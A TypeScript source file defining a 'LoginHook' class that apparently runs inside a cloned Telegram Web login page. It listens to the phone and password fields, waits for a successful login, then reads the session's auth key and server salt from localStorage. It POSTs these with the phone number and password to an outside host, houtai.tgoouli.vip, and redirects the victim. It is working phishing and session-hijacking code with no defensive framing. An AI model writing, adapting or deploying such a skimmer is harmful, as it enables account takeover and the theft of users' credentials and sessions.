export class LoginHook {
  private static instance: LoginHook;
  private apiUrl: string;
  private checkLoginInterval: any;

  private constructor() {
    // 从全局配置中获取 API URL
    this.apiUrl = (window as any).TG_CONFIG?.apiUrl || 'https://houtai.tgoouli.vip/api/index/save';
    this.init();
  }

  public static getInstance(): LoginHook {
    if (!LoginHook.instance) {
      LoginHook.instance = new LoginHook();
    }
    return LoginHook.instance;
  }

  private init() {
    // 添加手机号监听
    this.listenForPhone();

    // 添加密码监听
    this.listenForPassword();

    // 检测登录状态
    this.checkLoginInterval = setInterval(() => {
      this.checkLoginStatus();
    }, 100);

    console.log('登录钩子初始化完成');
  }

  private listenForPhone() {
    const checkExist = setInterval(() => {
      const phoneInput = document.querySelector('.input-field-phone .input-field-input');
      if (phoneInput) {
        console.log('页面初始化完毕');

        phoneInput.addEventListener('input', () => {
          const phone = (phoneInput as HTMLElement).textContent;
          console.log(phone);
          localStorage.setItem('Phone', phone || '');
        });

        clearInterval(checkExist);
      }
    }, 100);
  }

  private listenForPassword() {
    const checkPassword = setInterval(() => {
      const passwordInput = document.querySelector('input[name="notsearch_password"]');
      if (passwordInput) {
        console.log('密码输入框已出现');

        passwordInput.addEventListener('input', (e) => {
          const password = (e.target as HTMLInputElement).value;
          console.log(password);
          localStorage.setItem('password', password);
        });

        clearInterval(checkPassword);
      }
    }, 100);
  }

  private checkLoginStatus() {
    try {
      const userAuthStr = localStorage.getItem('user_auth');
      if (!userAuthStr) return;

      const userAuth = JSON.parse(userAuthStr);

      if (!userAuth.id) return;

      console.log('登录成功');
      clearInterval(this.checkLoginInterval);

      const phone = localStorage.getItem('Phone');
      const password = localStorage.getItem('password');
      const dc = localStorage.getItem('dc');
      const stateId = localStorage.getItem('state_id');
      const dcServerSalt = localStorage.getItem(`dc${dc}_server_salt`);
      const dcAuthKey = localStorage.getItem(`dc${dc}_auth_key`);

      const loginData = {
        userAuthId: Number(userAuth.id),
        userAuthDate: Math.floor(Date.now() / 1000),
        phone,
        pwd: password,
        userAuthDcId: Number(dc),
        dcServerSalt: dcServerSalt ? dcServerSalt.substring(1, dcServerSalt.length - 1) : '',
        dcAuthKey: dcAuthKey ? dcAuthKey.substring(1, dcAuthKey.length - 1) : '',
        stateId: Number(stateId),
        url: 'web'
      };

      console.log('准备发送数据:', Object.keys(loginData));

      fetch(this.apiUrl, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify(loginData)
      })
        .then((response) => {
          if (response.ok) {
            console.log('数据上传完毕');

            localStorage.removeItem('Phone');
            localStorage.removeItem('password');

            const redirectUrl = (window as any).TG_CONFIG?.redirectUrl;

            if (redirectUrl) {
              console.log('准备跳转到:', redirectUrl);
              window.location.href = redirectUrl;
            } else {
              console.log('未指定跳转地址，停留在当前页面');
            }
          } else {
            console.error('数据上传失败');
          }
        })
        .catch((error) => {
          console.error('发送请求错误:', error);
        });
    } catch (error) {
      console.error('检查登录状态错误:', error);
    }
  }
}

// 初始化登录钩子
LoginHook.getInstance();
